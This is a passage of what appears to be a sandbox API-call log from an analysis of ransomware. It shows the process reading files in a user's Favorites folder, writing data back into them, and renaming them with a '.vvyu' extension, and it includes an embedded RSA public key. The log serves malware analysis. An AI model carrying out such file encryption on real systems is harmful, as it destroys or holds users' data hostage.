hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.177] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0197.177] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0197.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.177] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0197.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.178] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e950f8 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e950b0 [0197.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0197.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0197.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0197.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0197.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0197.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0197.179] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0197.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0197.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0197.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f78 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2f60 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0197.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0197.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0197.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0197.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0197.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0197.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0197.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0197.183] GetCurrentThreadId () returned 0x66c [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5890 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0197.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.184] GetCurrentThreadId () returned 0x66c [0197.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0197.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0197.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0197.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0197.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0197.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0197.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f78 [0197.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0197.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0197.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fd8 [0197.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0197.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ff0 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f90 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f60 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0197.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0197.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0197.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0197.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0197.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0197.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0197.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0197.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0197.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0197.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0197.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0197.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0197.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0197.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0197.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e950b0 | out: hHeap=0x620000) returned 1 [0197.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0197.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0197.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0197.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0197.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0197.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0197.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0197.194] WriteFile (in: hFile=0x568, lpBuffer=0x2e915e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e915e0*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0197.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0197.195] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.195] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0197.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0197.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0197.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0197.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0197.197] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0197.198] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.198] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.198] CloseHandle (hObject=0x568) returned 1 [0197.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0197.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0197.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0197.199] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url.vvyu")) returned 1 [0197.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.201] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0197.204] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0197.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0197.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.205] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0197.205] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0197.205] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0197.206] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0197.208] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.209] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.210] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.210] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0197.210] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0197.210] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.210] lstrlenA (lpString="-----BEGIN PUBLIC 